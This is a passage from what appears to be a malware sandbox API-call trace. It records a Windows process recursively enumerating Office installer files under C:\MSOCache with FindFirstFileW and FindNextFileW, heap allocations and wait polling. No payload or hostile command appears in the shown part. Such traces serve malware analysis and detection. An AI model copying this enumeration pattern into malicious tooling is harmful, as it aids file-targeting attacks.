ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.327] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.343] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0071.343] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.343] lstrlenW (lpString="GrooveLR.cab") returned 12 [0071.343] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.344] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3d8 | out: hHeap=0x6d0000) returned 1 [0071.344] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0071.344] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.344] lstrlenW (lpString="{90140000-0115-0409-1000-0000000FF1CE}-C") returned 40 [0071.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.398] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.398] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.399] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0071.399] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.399] lstrlenW (lpString="1033") returned 4 [0071.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x70bae0 [0071.399] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x70bae0 | out: lpFindFileData=0x70bae0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f57c8 [0071.404] FindNextFileW (in: hFindFile=0x6f57c8, lpFindFileData=0x70bae0 | out: lpFindFileData=0x70bae0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.404] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.404] FindNextFileW (in: hFindFile=0x6f57c8, lpFindFileData=0x70bae0 | out: lpFindFileData=0x70bae0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0071.404] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.405] lstrlenW (lpString="dwintl20.dll") returned 12 [0071.405] FindNextFileW (in: hFindFile=0x6f57c8, lpFindFileData=0x70bae0 | out: lpFindFileData=0x70bae0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 0 [0071.405] FindClose (in: hFindFile=0x6f57c8 | out: hFindFile=0x6f57c8) returned 1 [0071.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bae0 | out: hHeap=0x6d0000) returned 1 [0071.405] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0071.406] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.406] lstrlenW (lpString="branding.xml") returned 12 [0071.406] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x70c258 [0071.406] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0071.406] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.406] lstrlenW (lpString="DW20.EXE") returned 8 [0071.406] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0071.406] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.406] lstrlenW (lpString="dwdcw20.dll") returned 11 [0071.406] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0071.406] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.406] lstrlenW (lpString="dwtrig20.exe") returned 12 [0071.407] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0071.407] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.407] lstrlenW (lpString="Microsoft.VC90.CRT.manifest") returned 27 [0071.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10e) returned 0x70ce28 [0071.407] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0071.407] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.407] lstrlenW (lpString="msvcr90.dll") returned 11 [0071.407] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0071.407] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.407] lstrlenW (lpString="OfficeLR.cab") returned 12 [0071.407] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0071.408] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.408] lstrlenW (lpString="OfficeMUI.msi") returned 13 [0071.408] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0071.408] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.408] lstrlenW (lpString="OfficeMUI.xml") returned 13 [0071.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf2) returned 0x70bae0 [0071.408] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0071.408] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.408] lstrlenW (lpString="OfficeMUISet.msi") returned 16 [0071.408] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0071.408] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.408] lstrlenW (lpString="OfficeMUISet.xml") returned 16 [0071.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf8) returned 0x70bbe0 [0071.409] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0071.409] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.409] lstrlenW (lpString="osetupui.dll") returned 12 [0071.409] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0071.409] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.409] lstrlenW (lpString="pss10r.chm") returned 10 [0071.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xec) returned 0x1312240 [0071.409] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0071.409] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.409] lstrlenW (lpString="setup.chm") returned 9 [0071.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xea) returned 0x1312338 [0071.409] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0071.409] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.409] lstrlenW (lpString="Setup.xml") returned 9 [0071.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xea) returned 0x1312430 [0071.410] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0071.410] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.410] lstrlenW (lpString="ShellUI.MST") returned 11 [0071.410] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x1312528 [0071.410] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 0 [0071.410] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3d8 | out: hHeap=0x6d0000) returned 1 [0071.410] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0071.410] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.410] lstrlenW (lpString="{90140000-0117-0409-1000-0000000FF1CE}-C") returned 40 [0071.410] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x70b3d8 [0071.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.500] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.524] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.531] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0071.531] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.531] lstrlenW (lpString="Access.en-us") returned 12 [0071.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1312620 [0071.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cf40 [0071.550] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.569] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.569] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0071.569] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.569] lstrlenW (lpString="AccessMUI.msi") returned 13 [0071.570] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0071.570] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.570] lstrlenW (lpString="AccessMUI.xml") returned 13 [0071.570] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10c) returned 0x1312050 [0071.570] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccLR.cab", cAlternateFileName="")) returned 1 [0071.570] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.570] lstrlenW (lpString="AccLR.cab") returned 9 [0071.570] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, 